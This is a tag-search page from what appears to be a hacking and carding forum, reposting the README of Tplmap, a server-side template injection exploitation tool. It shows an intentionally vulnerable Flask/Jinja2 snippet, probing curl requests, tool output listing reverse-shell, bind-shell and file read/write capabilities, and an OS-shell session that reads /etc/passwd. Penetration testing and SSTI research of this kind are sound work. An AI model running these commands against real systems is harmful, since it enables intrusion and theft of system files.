Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
SERVICE

Search the Community

Showing results for tags 'tplmap'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Staff Control
    • Staff Announcements
  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Pentesting Zone
    • Pentesting Accounts
    • Reverse Engineering
  • Security & Anonymity
    • Security
    • Wireless Security
    • Web Security
    • Anonymity
  • Operating Systems | Hardware | Programs
    • Operating systems
    • Hardware
    • PC programs
    • iOS
    • Android
  • Graphic Design
    • Graphic Design
  • vBCms Comments
  • live stream tv
    • live stream tv
  • Marketplace
    • Sell
    • Services
    • Request
  • Pentesting Premium
    • Pentesting Accounts
  • Modders Section
    • Source Codes
    • Manuals | Videos
    • Tools
    • Others
  • PRIV8-Section
    • Exploits
    • Accounts|Dumps
    • Crypter|Binder|Bots
    • Tutorials|Videos
    • Cracked Tools
    • Make Money
    • More Tools
    • Databeses
    • Ebooks
  • Pentesting Zone PRIV8
    • Pentesting Accounts
    • Reverse Engineering
    • Cracker Preview Area
  • Carding Zone PRIV8
    • Carding
    • Phishing
    • Defacing
    • Doxing
    • Special User Premium Preview Area
  • Recycle Bin
    • Recycle
  • Null3D's Nulled Group

Product Groups

  • PRIV8
  • Advertising
  • Access Basic
  • Seller
  • Services

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me

Found 1 result

  1. 0x1

    Tplmap

    Server-Side Template Injection and Code Injection Detection and Exploitation Tool Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system. The tool and its test suite are developed to research the SSTI vulnerability class and to be used as offensive security tool during web application penetration tests. It can exploit several code context and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines. Server-Side Template Injection Assume that you are auditing a web site that generates dynamic pages using templates composed with user-provided values, such as this web application written in Python and Flask that uses Jinja2 template engine in an unsafe way. from flask import Flask, request from jinja2 import Environment app = Flask(__name__) Jinja2 = Environment() @app.route("/page") def page(): name = request.values.get('name') # SSTI VULNERABILITY # The vulnerability is introduced concatenating the # user-provided `name` variable to the template string. output = Jinja2.from_string('Hello ' + name + '!').render() # Instead, the variable should be passed to the template context. # Jinja2.from_string('Hello {{name}}!').render(name = name) return output if __name__ == "__main__": app.run(host='0.0.0.0', port=80) From a black box testing perspective, the page reflects the value similarly to a XSS vulnerability, but also computes basic operation at runtime disclosing its SSTI nature. $ curl -g '[Hidden Content]' Hello John! $ curl -g '[Hidden Content]={% raw %}{{7*7}}{% endraw %}' Hello 49! Exploitation Tplmap is able to detect and exploit SSTI in a range of template engines to get access to the underlying file system and operating system. Run it against the URL to test if the parameters are vulnerable. $ ./tplmap.py -u '[Hidden Content]' [+] Tplmap 0.5 Automatic Server-Side Template Injection Detection and Exploitation Tool [+] Testing if GET parameter 'name' is injectable [+] Smarty plugin is testing rendering with tag {% raw %}'{*}'{% endraw %} [+] Smarty plugin is testing blind injection [+] Mako plugin is testing rendering with tag {% raw %}'${*}'{% endraw %} ... [+] Jinja2 plugin is testing rendering with tag {% raw %}'{{*}}'{% endraw %} [+] Jinja2 plugin has confirmed injection with tag {% raw %}'{{*}}'{% endraw %} [+] Tplmap identified the following injection point: GET parameter: name Engine: Jinja2 Injection: {% raw %}{{*}}{% endraw %} Context: text OS: linux Technique: render Capabilities: Shell command execution: ok Bind and reverse shell: ok File write: ok File read: ok Code evaluation: ok, python code [+] Rerun tplmap providing one of the following options: --os-shell Run shell on the target --os-cmd Execute shell commands --bind-shell PORT Connect to a shell bind to a target port --reverse-shell HOST PORT Send a shell back to the attacker's port --upload LOCAL REMOTE Upload files to the server --download REMOTE LOCAL Download remote files Use --os-shell option to launch a pseudo-terminal on the target. $ ./tplmap.py --os-shell -u '[Hidden Content]' [+] Tplmap 0.5 Automatic Server-Side Template Injection Detection and Exploitation Tool [+] Run commands on the operating system. linux $ whoami www linux $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh Supported template engines Tplmap supports over 15 template engines, unsandboxed template engines and generic eval()-like injections. Engine Remote Command Execution Blind Code evaluation File read File write Mako ✓ ✓ Python ✓ ✓ Jinja2 ✓ ✓ Python ✓ ✓ Python (code eval) ✓ ✓ Python ✓ ✓ Tornado ✓ ✓ Python ✓ ✓ Nunjucks ✓ ✓ JavaScript ✓ ✓ Pug ✓ ✓ JavaScript ✓ ✓ doT ✓ ✓ JavaScript ✓ ✓ Marko ✓ ✓ JavaScript ✓ ✓ JavaScript (code eval) ✓ ✓ JavaScript ✓ ✓ Dust (<= [email protected]) ✓ ✓ JavaScript ✓ ✓ EJS ✓ ✓ JavaScript ✓ ✓ Ruby (code eval) ✓ ✓ Ruby ✓ ✓ Slim ✓ ✓ Ruby ✓ ✓ ERB ✓ ✓ Ruby ✓ ✓ Smarty (unsecured) ✓ ✓ PHP ✓ ✓ PHP (code eval) ✓ ✓ PHP ✓ ✓ Twig (<=1.19) ✓ ✓ PHP ✓ ✓ Freemarker ✓ ✓ × ✓ ✓ Velocity ✓ ✓ × ✓ ✓ Twig (>1.19) × × × × × Smarty (secured) × × × × × Dust (> [email protected]) × × × × × Burp Suite Plugin See [Hidden Content]
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.